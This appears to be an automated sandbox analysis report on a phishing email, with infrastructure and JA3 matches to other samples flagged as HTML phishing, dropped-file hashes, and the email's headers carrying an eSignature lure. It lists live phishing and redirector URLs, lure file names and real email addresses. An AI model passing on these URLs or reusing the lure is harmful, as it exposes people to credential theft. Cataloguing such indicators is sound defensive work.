	https://infra-metals-com.fortimailcloud.com/fmlurlsvc/?fewReq=:B:JVc9NjQ1PSFxOjUpNyFuYzo3Nj03NiF0bmBpZnNydWI6MDJkNz43ZDFkNjc2MTVjZDA+PmM3ZGE2Y2NjMzczYjczNzNmNTMxNSFzOjYwNTcyMzAzNzchdm5jOjMxPk9oN2tNNDE/Nj8wNiozMT5PaDdrTDQxPzY/MDYhdWR3czohZDo1MyFvY2s6Nw==&url=https%3a%2f%2fapp.box.com%2fs%2f85jljehjkk29pmgilaop1n5jhwf19q71	Get hash	malicious	HTMLPhisher	Browse	40.99.150.82
	https://faragozin.com/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://m.exactag.com/ai.aspx?tc=d9056318bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Abpwebdesign.co.za%2ftiftb	Get hash	malicious	HTMLPhisher	Browse	13.107.21.237
	https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fjbcloudcm.com%2FShare%2FDocuments%3FItemsView%3D6d2bef0fc2cc8abdc0d7d5a46222227c%26name%3DTXV6emFtaWwgS2FzaGlm%26ga%3D1&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Famer%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=PoYadgo9Ls3mgvlx0kuPEMxm%252bwTOMYiZ46lyzlCU8xIBr3LW%252bL0o12kVt7%252fmStF%252bOCnsuO3Ogupz80PvFn%252b9%252beAaEjtKV9RTSMxWAvC%252fOcGEqJZX4%252fjz5SalQaE6KDe81hPWSAzI%252b6PXUvP4pm8mAkM8cI9kAgB1plEWjlEONeRUkn4i8%252fBTHH2UJdrtmZdMCC5B64UKWqUXmocfkEKdnXh037fS0CUzlrO7tWEl8uyXZp9xGkBALiWtac8fMmK%252fbPSLtkCjGL8TpdseALvO8etXLFoaIVe72C6DW9NU7rP3aCDaxIJG%252fBvsM1M%252fuP5zUaJ2kD3EY%252fnGpVtqhk0DyOl4NqTNaW4BdakLhDjJnswqOilNaPwObC6yEuwBNIuBmuNE3NpIPamphR21b6RQVqifNQb%252b2uOcIWEy50MNDI2bx%252fR11clXIMktl2rtHtNJGRgeciOmnOBmEvF4pQoe5xKacUHq2LTTknqh4SGJB3oqiko4gKhQEbZgfurA2bVPJXfGTxCeMLAti8rkwHOFQfAC%252fNHSQfrzzk9hlciRDLqxA%252fY9RpyiFTLlr%252fuIq3dpU%252bRWh4FFOsdvjE5cAAaS2MNcpnM15pW7GjJsF9zZ0%252fc%252b7ek%252bvjsFypc0VeTv4Gq1PMrjlv7u%252f1EVQ7zVcUKsLWKc2QfbVN54h8gZNxKUMYq0WyjvEio9TrHD%252fZByQ8S%252bqyhwlJ4a4rdkrcOu6zQF9kWcFtOb0WQQ18j5tI6Iazc8%252fkhFC6HHtkN8dOP%252bp1sZYOZ0R5b5%252f8eMWDy9Hw2PG8FvASO93EPlZ%252boGptDKsNNeUmVDeuGAMA%252bbsJd9fOhC2A302fyXgfVASjfZ0WS3kO4xuwkgMO%252bccYwPpAM%252f1f97zxXK%252fbgY9NP7i%252fZ5qqCNI%252fk63RPxiXiD%252fIyTu4bcfVTwrIayQMNFREVh1hiGhMF%252bJR%252fedscJy%252bRrGVrSEHi7YhPsc0AKvGwd7wOmU%252fVlJzzm4meOFczCdroxBZ7Sx6zZ78qtQDar7bBCiE43ceuLt%252f6HEC3n8KZG2Wny7P16mS5VQBkd2ZWxKa%252f1omxrcvBRo1lYYONsjHmgJwfFFunU%252fW6XVXk1RKoHZDaOeELeQ6WI45oOWJ5CJVoPSEAYBd4kLkxDWc6wNYVGBYDwmKMP7HmK5ms1LS8tIGwZ5brVn%252bSpCSUAMFzTTgIUuT1QDbMybVzmP3y9K4QlrQjAbraW7R4UzSGdQltnFavU69Bezo1KHe1VaWW8zNRyvJgsicwEuFbuf%252bTk2%252bpEzTrxlqJDCsgCvHi%252fhTi1CYIWW6hOpAGwPr1i%252bRMuQRY2I4ft7THOB0aAE3DEaSpRvw0vnbU%252ftAzogk78QKyIlNhBDjJhL%252fG5o6sNvsax4MlOLFYpqMdQlcy%252fEpN5bbLt0BXSYyJfUFinyW0ZZjPNKZUSd1AtoEAKLE3O2LgXtgUQ3x	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	L Catterton Financial Report.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
MICROSOFT-CORP-MSN-AS-BLOCKUS	(No subject) (30).eml	Get hash	malicious	HTMLPhisher	Browse	52.98.178.242
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adILp4_JhWgToIvlhf8IbyXGrG8GglWu5d4OO3mWF7G0NW268WP5xHPAH91Smpp-2FtRR9XuZpKnKdg4HDhWDJjJJqbsy3CETEnNy05m5SD4mKlJNLbHb9HbmD7EWJkqf98w2dIvZium8i4zWFkqRVKAxKp4ASC-2Fsc2qaOwL1HipMLWQLyXnDciGaAPfs5ThB8LH4A4fjOpAnQHDnaqDId42Y7pIhFkhd9sQB37NkzuC5dZa48XY-3D	Get hash	malicious	Unknown	Browse	20.49.124.158
	robert e-Doc File_170024.docx	Get hash	malicious	HTMLPhisher	Browse	40.126.32.138
	https://assets-usa.mkt.dynamics.com/165a2e8c-373d-ef11-8e49-000d3a8f6e27/digitalassets/standaloneforms/a85836a1-f33d-ef11-8409-002248344b7e	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adSQKz_p4A4YQt8epDIK9HlKea9sSCl3MXKBcpnU56jmD4aRDdTAeOMJcZw3f8VvV8NLbbjL0uMrdxhQK8GxzwqBkLcmylT-2FEY5XbwR3K-2FC6xfqqGuExQq3SNizKWxflJyHsJI0nslnt0a8xlK3Fd8H-2FKOV3XlJnsljFNByTu7JCMLXg-2BPQ54flDZp4tHyGuD3hMkJOlLEAOp0eJSpzLMOMd9b3yw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	52.146.76.30
	https://infra-metals-com.fortimailcloud.com/fmlurlsvc/?fewReq=:B:JVc9NjQ1PSFxOjUpNyFuYzo3Nj03NiF0bmBpZnNydWI6MDJkNz43ZDFkNjc2MTVjZDA+PmM3ZGE2Y2NjMzczYjczNzNmNTMxNSFzOjYwNTcyMzAzNzchdm5jOjMxPk9oN2tNNDE/Nj8wNiozMT5PaDdrTDQxPzY/MDYhdWR3czohZDo1MyFvY2s6Nw==&url=https%3a%2f%2fapp.box.com%2fs%2f85jljehjkk29pmgilaop1n5jhwf19q71	Get hash	malicious	HTMLPhisher	Browse	40.99.150.82
	https://faragozin.com/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://m.exactag.com/ai.aspx?tc=d9056318bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Abpwebdesign.co.za%2ftiftb	Get hash	malicious	HTMLPhisher	Browse	13.107.21.237
	https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fjbcloudcm.com%2FShare%2FDocuments%3FItemsView%3D6d2bef0fc2cc8abdc0d7d5a46222227c%26name%3DTXV6emFtaWwgS2FzaGlm%26ga%3D1&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Famer%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=PoYadgo9Ls3mgvlx0kuPEMxm%252bwTOMYiZ46lyzlCU8xIBr3LW%252bL0o12kVt7%252fmStF%252bOCnsuO3Ogupz80PvFn%252b9%252beAaEjtKV9RTSMxWAvC%252fOcGEqJZX4%252fjz5SalQaE6KDe81hPWSAzI%252b6PXUvP4pm8mAkM8cI9kAgB1plEWjlEONeRUkn4i8%252fBTHH2UJdrtmZdMCC5B64UKWqUXmocfkEKdnXh037fS0CUzlrO7tWEl8uyXZp9xGkBALiWtac8fMmK%252fbPSLtkCjGL8TpdseALvO8etXLFoaIVe72C6DW9NU7rP3aCDaxIJG%252fBvsM1M%252fuP5zUaJ2kD3EY%252fnGpVtqhk0DyOl4NqTNaW4BdakLhDjJnswqOilNaPwObC6yEuwBNIuBmuNE3NpIPamphR21b6RQVqifNQb%252b2uOcIWEy50MNDI2bx%252fR11clXIMktl2rtHtNJGRgeciOmnOBmEvF4pQoe5xKacUHq2LTTknqh4SGJB3oqiko4gKhQEbZgfurA2bVPJXfGTxCeMLAti8rkwHOFQfAC%252fNHSQfrzzk9hlciRDLqxA%252fY9RpyiFTLlr%252fuIq3dpU%252bRWh4FFOsdvjE5cAAaS2MNcpnM15pW7GjJsF9zZ0%252fc%252b7ek%252bvjsFypc0VeTv4Gq1PMrjlv7u%252f1EVQ7zVcUKsLWKc2QfbVN54h8gZNxKUMYq0WyjvEio9TrHD%252fZByQ8S%252bqyhwlJ4a4rdkrcOu6zQF9kWcFtOb0WQQ18j5tI6Iazc8%252fkhFC6HHtkN8dOP%252bp1sZYOZ0R5b5%252f8eMWDy9Hw2PG8FvASO93EPlZ%252boGptDKsNNeUmVDeuGAMA%252bbsJd9fOhC2A302fyXgfVASjfZ0WS3kO4xuwkgMO%252bccYwPpAM%252f1f97zxXK%252fbgY9NP7i%252fZ5qqCNI%252fk63RPxiXiD%252fIyTu4bcfVTwrIayQMNFREVh1hiGhMF%252bJR%252fedscJy%252bRrGVrSEHi7YhPsc0AKvGwd7wOmU%252fVlJzzm4meOFczCdroxBZ7Sx6zZ78qtQDar7bBCiE43ceuLt%252f6HEC3n8KZG2Wny7P16mS5VQBkd2ZWxKa%252f1omxrcvBRo1lYYONsjHmgJwfFFunU%252fW6XVXk1RKoHZDaOeELeQ6WI45oOWJ5CJVoPSEAYBd4kLkxDWc6wNYVGBYDwmKMP7HmK5ms1LS8tIGwZ5brVn%252bSpCSUAMFzTTgIUuT1QDbMybVzmP3y9K4QlrQjAbraW7R4UzSGdQltnFavU69Bezo1KHe1VaWW8zNRyvJgsicwEuFbuf%252bTk2%252bpEzTrxlqJDCsgCvHi%252fhTi1CYIWW6hOpAGwPr1i%252bRMuQRY2I4ft7THOB0aAE3DEaSpRvw0vnbU%252ftAzogk78QKyIlNhBDjJhL%252fG5o6sNvsax4MlOLFYpqMdQlcy%252fEpN5bbLt0BXSYyJfUFinyW0ZZjPNKZUSd1AtoEAKLE3O2LgXtgUQ3x	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	L Catterton Financial Report.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
CLOUDFLARENETUS	(No subject) (30).eml	Get hash	malicious	HTMLPhisher	Browse	104.21.35.45
	http://adlidom.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	robert e-Doc File_170024.docx	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adSQKz_p4A4YQt8epDIK9HlKea9sSCl3MXKBcpnU56jmD4aRDdTAeOMJcZw3f8VvV8NLbbjL0uMrdxhQK8GxzwqBkLcmylT-2FEY5XbwR3K-2FC6xfqqGuExQq3SNizKWxflJyHsJI0nslnt0a8xlK3Fd8H-2FKOV3XlJnsljFNByTu7JCMLXg-2BPQ54flDZp4tHyGuD3hMkJOlLEAOp0eJSpzLMOMd9b3yw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://infra-metals-com.fortimailcloud.com/fmlurlsvc/?fewReq=:B:JVc9NjQ1PSFxOjUpNyFuYzo3Nj03NiF0bmBpZnNydWI6MDJkNz43ZDFkNjc2MTVjZDA+PmM3ZGE2Y2NjMzczYjczNzNmNTMxNSFzOjYwNTcyMzAzNzchdm5jOjMxPk9oN2tNNDE/Nj8wNiozMT5PaDdrTDQxPzY/MDYhdWR3czohZDo1MyFvY2s6Nw==&url=https%3a%2f%2fapp.box.com%2fs%2f85jljehjkk29pmgilaop1n5jhwf19q71	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	locksystem.ps1	Get hash	malicious	Unknown	Browse	104.26.4.177
	https://witechmonth.com/	Get hash	malicious	Unknown	Browse	104.19.178.52
	http://9yhbs.contnova.srv.br/#X7	Get hash	malicious	Unknown	Browse	104.17.112.233
	https://faragozin.com/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	locksystem.bin.exe	Get hash	malicious	Unknown	Browse	104.26.4.177

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	(No subject) (30).eml	Get hash	malicious	HTMLPhisher	Browse	23.43.61.160 40.126.32.74 20.114.59.183
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adILp4_JhWgToIvlhf8IbyXGrG8GglWu5d4OO3mWF7G0NW268WP5xHPAH91Smpp-2FtRR9XuZpKnKdg4HDhWDJjJJqbsy3CETEnNy05m5SD4mKlJNLbHb9HbmD7EWJkqf98w2dIvZium8i4zWFkqRVKAxKp4ASC-2Fsc2qaOwL1HipMLWQLyXnDciGaAPfs5ThB8LH4A4fjOpAnQHDnaqDId42Y7pIhFkhd9sQB37NkzuC5dZa48XY-3D	Get hash	malicious	Unknown	Browse	23.43.61.160 40.126.32.74 20.114.59.183
	https://assets-usa.mkt.dynamics.com/165a2e8c-373d-ef11-8e49-000d3a8f6e27/digitalassets/standaloneforms/a85836a1-f33d-ef11-8409-002248344b7e	Get hash	malicious	Unknown	Browse	23.43.61.160 40.126.32.74 20.114.59.183
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adSQKz_p4A4YQt8epDIK9HlKea9sSCl3MXKBcpnU56jmD4aRDdTAeOMJcZw3f8VvV8NLbbjL0uMrdxhQK8GxzwqBkLcmylT-2FEY5XbwR3K-2FC6xfqqGuExQq3SNizKWxflJyHsJI0nslnt0a8xlK3Fd8H-2FKOV3XlJnsljFNByTu7JCMLXg-2BPQ54flDZp4tHyGuD3hMkJOlLEAOp0eJSpzLMOMd9b3yw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	23.43.61.160 40.126.32.74 20.114.59.183
	https://witechmonth.com/	Get hash	malicious	Unknown	Browse	23.43.61.160 40.126.32.74 20.114.59.183
	http://9yhbs.contnova.srv.br/#X7	Get hash	malicious	Unknown	Browse	23.43.61.160 40.126.32.74 20.114.59.183
	https://faragozin.com/	Get hash	malicious	HTMLPhisher	Browse	23.43.61.160 40.126.32.74 20.114.59.183
	https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fjbcloudcm.com%2FShare%2FDocuments%3FItemsView%3D6d2bef0fc2cc8abdc0d7d5a46222227c%26name%3DTXV6emFtaWwgS2FzaGlm%26ga%3D1&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Famer%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=PoYadgo9Ls3mgvlx0kuPEMxm%252bwTOMYiZ46lyzlCU8xIBr3LW%252bL0o12kVt7%252fmStF%252bOCnsuO3Ogupz80PvFn%252b9%252beAaEjtKV9RTSMxWAvC%252fOcGEqJZX4%252fjz5SalQaE6KDe81hPWSAzI%252b6PXUvP4pm8mAkM8cI9kAgB1plEWjlEONeRUkn4i8%252fBTHH2UJdrtmZdMCC5B64UKWqUXmocfkEKdnXh037fS0CUzlrO7tWEl8uyXZp9xGkBALiWtac8fMmK%252fbPSLtkCjGL8TpdseALvO8etXLFoaIVe72C6DW9NU7rP3aCDaxIJG%252fBvsM1M%252fuP5zUaJ2kD3EY%252fnGpVtqhk0DyOl4NqTNaW4BdakLhDjJnswqOilNaPwObC6yEuwBNIuBmuNE3NpIPamphR21b6RQVqifNQb%252b2uOcIWEy50MNDI2bx%252fR11clXIMktl2rtHtNJGRgeciOmnOBmEvF4pQoe5xKacUHq2LTTknqh4SGJB3oqiko4gKhQEbZgfurA2bVPJXfGTxCeMLAti8rkwHOFQfAC%252fNHSQfrzzk9hlciRDLqxA%252fY9RpyiFTLlr%252fuIq3dpU%252bRWh4FFOsdvjE5cAAaS2MNcpnM15pW7GjJsF9zZ0%252fc%252b7ek%252bvjsFypc0VeTv4Gq1PMrjlv7u%252f1EVQ7zVcUKsLWKc2QfbVN54h8gZNxKUMYq0WyjvEio9TrHD%252fZByQ8S%252bqyhwlJ4a4rdkrcOu6zQF9kWcFtOb0WQQ18j5tI6Iazc8%252fkhFC6HHtkN8dOP%252bp1sZYOZ0R5b5%252f8eMWDy9Hw2PG8FvASO93EPlZ%252boGptDKsNNeUmVDeuGAMA%252bbsJd9fOhC2A302fyXgfVASjfZ0WS3kO4xuwkgMO%252bccYwPpAM%252f1f97zxXK%252fbgY9NP7i%252fZ5qqCNI%252fk63RPxiXiD%252fIyTu4bcfVTwrIayQMNFREVh1hiGhMF%252bJR%252fedscJy%252bRrGVrSEHi7YhPsc0AKvGwd7wOmU%252fVlJzzm4meOFczCdroxBZ7Sx6zZ78qtQDar7bBCiE43ceuLt%252f6HEC3n8KZG2Wny7P16mS5VQBkd2ZWxKa%252f1omxrcvBRo1lYYONsjHmgJwfFFunU%252fW6XVXk1RKoHZDaOeELeQ6WI45oOWJ5CJVoPSEAYBd4kLkxDWc6wNYVGBYDwmKMP7HmK5ms1LS8tIGwZ5brVn%252bSpCSUAMFzTTgIUuT1QDbMybVzmP3y9K4QlrQjAbraW7R4UzSGdQltnFavU69Bezo1KHe1VaWW8zNRyvJgsicwEuFbuf%252bTk2%252bpEzTrxlqJDCsgCvHi%252fhTi1CYIWW6hOpAGwPr1i%252bRMuQRY2I4ft7THOB0aAE3DEaSpRvw0vnbU%252ftAzogk78QKyIlNhBDjJhL%252fG5o6sNvsax4MlOLFYpqMdQlcy%252fEpN5bbLt0BXSYyJfUFinyW0ZZjPNKZUSd1AtoEAKLE3O2LgXtgUQ3x	Get hash	malicious	HTMLPhisher	Browse	23.43.61.160 40.126.32.74 20.114.59.183
	bfleming@armitwines.co.uk_2FA_Armit_Wines[1].pdf	Get hash	malicious	Unknown	Browse	23.43.61.160 40.126.32.74 20.114.59.183
	https://hootbio.com/kinecta	Get hash	malicious	Unknown	Browse	23.43.61.160 40.126.32.74 20.114.59.183

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	231348
Entropy (8bit):	4.39358169774674
Encrypted:	false
SSDEEP:	1536:9yYLcXgskND4I+FSQgsaUNcAz79ysQqt2/yW8qoQ+nrcm0FvPIMysiOOVFKM9KcA:/gg6NrgQmiGu2UqoQ+rt0Fv4gIz49h1
MD5:	BEDD632FF3426421F7B0C560CA42B3C0
SHA1:	12BD0C8C1675A7F115077F3F3C9FE4465B79C55A
SHA-256:	DEBF2922BE1858D6A1EE702F36EE7EC439EAB4A414248311369B569F91F1ED40
SHA-512:	E98A4053CEB2AAC31CA31BB368229CC287E5D066E6FED72AD3E8623DFBDD582EB55FF3561DDAA227B17F5AF22412930D60EE07EA1F66E0956DC10A1C2E534924
Malicious:	false
Reputation:	low
Preview:	TH02...... .p(..1.......SM01X...,......1...........IPM.Activity...........h...............h............H..h\|.......Y.6...h........pK..H..h\tor ...AppD...h.\..0.........h1.._...........h........_`.k...hm.._@...I.+w...h....H...8..k...0....T...............d.........2h...............k..............!h.............. h.............#h....8.........$hpK......8....."h..............'h..............1h1.._<.........0h....4.....k../h....h......kH..h....p...\|.....-h .............+h..._....p................... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 9 17:52:10 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9942119138479075
Encrypted:	false
SSDEEP:	48:8iGd+T/7Yt4HZidAKZdA1JehwiZUklqehny+3:8iPcCUy
MD5:	2B3A257D11A105EB1FB5B3087A60053C
SHA1:	1B05277DF7DD7B1C0418E1BAEC97107CCF8757CE
SHA-256:	B6548F3ED4BC24D6D8D8AD19B707987C8DFED3865D027C54CDF55131C0C4F08A
SHA-512:	1C15B4B0E9ECE3556D84837150A97E4A45C180DC062DBA0380FA319A166493FBAA366BB8BB872FA1664B533BE5B5035DF1EDC1A39D0993B997C6EB1997E960EF
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....N..1.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xo.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N..U.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	RFC 822 mail, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Entropy (8bit):	5.965253087892083
TrID:	Text - UTF-8 encoded (3003/1) 100.00%
File name:	July2024.eml
File size:	19'546 bytes
MD5:	921a018c2476712d1cdeb21f54161b4d
SHA1:	c0a2d49d221ed78d21cb10cf62bd261d5adefe41
SHA256:	af94c507da9bdbccd2d48a010d31e101a00955d85ceca4dc928a0d6bfe3e40e6
SHA512:	8b27946516a2bde6941add1a48e06fdefb7d39942256e3d296d49a8ba98db2eb1aa2949f52e5f1eb2505af3fe666eb88ce8ba4fa128dbd442a99ae184ccd8f40
SSDEEP:	384:exEznJxtwLj3uHPFU4WvJlubibIo7omaTeoMLVZsc8BOX:exEznFSEfYlumPGa
TLSH:	52922A2583014D779A7716387002BA99B3B2B889933B85907C3F79274DCE4726FA76CD
File Content Preview:	...Received: from LV8PR05MB10573.namprd05.prod.outlook.com.. (2603:10b6:408:1f3::15) by BN7PR05MB4324.namprd05.prod.outlook.com with.. HTTPS; Thu, 4 Jul 2024 15:33:01 +0000..Received: from PH0PR07CA0060.namprd07.prod.outlook.com (2603:10b6:510:e::35).. by

Subject:	eSignature Required on "New Live-quinn Contract SC #73461-0-252 - Important Notices and Disclosures" eSign chigley/Live-quinn 03July2024
From:	"Darrel Hand Esq." <phil@qimacros.com>
To:	chigley@live-quinn.com
Cc:
BCC:
Date:	Thu, 04 Jul 2024 15:32:39 +0000
Communications:
Attachments:

Key	Value
Received	from [127.0.0.1] (10.72.152.123) by winhex19beus3.winusa.mail (10.72.152.12) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384) id 15.2.1544.11; Thu, 4 Jul 2024 11:32:44 -0400
Authentication-Results	spf=pass (sender IP is 74.208.4.196) smtp.mailfrom=qimacros.com; dkim=none (message not signed) header.d=none;dmarc=pass action=none header.from=qimacros.com;compauth=pass reason=100
Received-SPF	Pass (protection.outlook.com: domain of qimacros.com designates 74.208.4.196 as permitted sender) receiver=protection.outlook.com; client-ip=74.208.4.196; helo=mout.perfora.net; pr=C
From	"Darrel Hand Esq." <phil@qimacros.com>
To	chigley@live-quinn.com
Subject	eSignature Required on "New Live-quinn Contract SC #73461-0-252 - Important Notices and Disclosures" eSign chigley/Live-quinn 03July2024
Message-ID	<77740adf-04ed-c14a-76df-9a11ee2ecf7e@qimacros.com>
Content-Transfer-Encoding	quoted-printable
Date	Thu, 04 Jul 2024 15:32:39 +0000
Content-Type	text/html; charset="utf-8"
Return-Path	phil@qimacros.com
X-ClientProxiedBy	winhex19beus5.winusa.mail (10.72.152.13) To winhex19beus3.winusa.mail (10.72.152.12)
X-Spam-Flag	NO
UI-OutboundReport	notjunk:1;M01:P0:iV1QW7lKCG8=;iQ4gUutl2qZQEmg3znut+w1xh39 ho45aLro12N9bvAENbooiV5HTheIuh62YcyeAUXIBLh4CqfLqbH7IxmVHptoPZKKOISdPxkj/ xnkHgGYSNrtX7YRGXO0P0ENYoNJ3G/t9hbKzYLszBX68aNQ8oNlyUYZ/89y56O7ZRf2MkCS0r w0ke0rDynadxEkLa0AO6BinZaFsc0rFl7yNQU6ZpYq8O6QC4p09/3nuuVW4u4dNIVuQG0UFhX m4JJDDDwRVz75huxuQSFiGF1qJsHZPFrDF6gFXNM5Tm7mWE2fIku/8xIujxuhamYDYZYs5h+l dhf/868e2+cxPytwoYeU7QgmMPK8o18soTKJPGy3A8fW4+/6acXMTtkihjj6NQzXwMCm/09sw QNPk5KrkI4lJUf9Ib1zGw6jiYWnEUgOY/REd9ZdCRFf2hHOaHpCd1MoIzn1oiI9F4yxIpowoX jpVKoVcF/0MU5sF8OK7deZGFNoBbn0j7X5HhBl0I+/mZtNAvJwjVhkP+kH7LlJ84F49jwRwJs 9B09cRBQBG6O0SQRv/ygy6R86L8hy1FOrou9WFxMAfExj+TMHYtsES1txmHHzvsHVQy3FOiS1 u0D/qVCDxbzHLmUodUzWL8Hnryy+N0S9ftIIYLhdr2ku8Fl8Ra3mvtSV6yNdQnAvb7c8vNN63 /AHbzki5jvBg17e3krrnObijDrL4LXHEty10UlpqdjHVTQwCtTYHe1YHq3BokS3GVhfpqQqJu JIOfMLWvMMb
X-MS-Exchange-Organization-ExpirationStartTime	04 Jul 2024 15:32:56.6321 (UTC)
X-MS-Exchange-Organization-ExpirationStartTimeReason	OriginalSubmit
X-MS-Exchange-Organization-ExpirationInterval	1:00:00:00.0000000
X-MS-Exchange-Organization-ExpirationIntervalReason	OriginalSubmit
